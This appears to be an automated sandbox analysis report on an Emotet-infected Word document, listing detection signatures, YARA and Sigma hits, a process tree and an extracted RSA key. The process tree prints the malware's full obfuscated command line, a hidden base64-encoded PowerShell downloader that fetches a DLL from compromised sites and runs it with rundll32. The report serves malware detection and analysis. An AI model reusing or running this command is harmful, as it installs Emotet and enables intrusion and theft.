Loading ...

Play interactive tourEdit tour

Analysis Report N00048481397007.doc

Overview

General Information

Sample Name:N00048481397007.doc
Analysis ID:343979
MD5:ad7db0f946bc5c3bb051cb04f359e6a4
SHA1:24d54a6a1c4280b948fb245c97e4823d319eefe1
SHA256:4fc6cbe4fae599ca6ab094dc1115909a687754f49a3ff31671ae4fbc7b3296d1

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2124 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1428 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA== MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2376 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
      • rundll32.exe (PID: 172 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • rundll32.exe (PID: 2056 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2884 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2864 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 252 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 1084 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1072 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
    • powershell.exe (PID: 2280 cmdline: powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 3016 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2940 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 3044 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2960 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2184 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 1468 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 1836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 3056 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3052 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2228 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2376 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000002.2368006651.0000000000250000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000017.00000002.2369643612.0000000000180000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000B.00000002.2339483010.00000000001F0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 49 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            20.2.rundll32.exe.200000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              18.2.rundll32.exe.750000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                15.2.rundll32.exe.250000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  17.2.rundll32.exe.400000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    7.2.rundll32.exe.430000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 67 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2940, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1, ProcessId: 3044
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
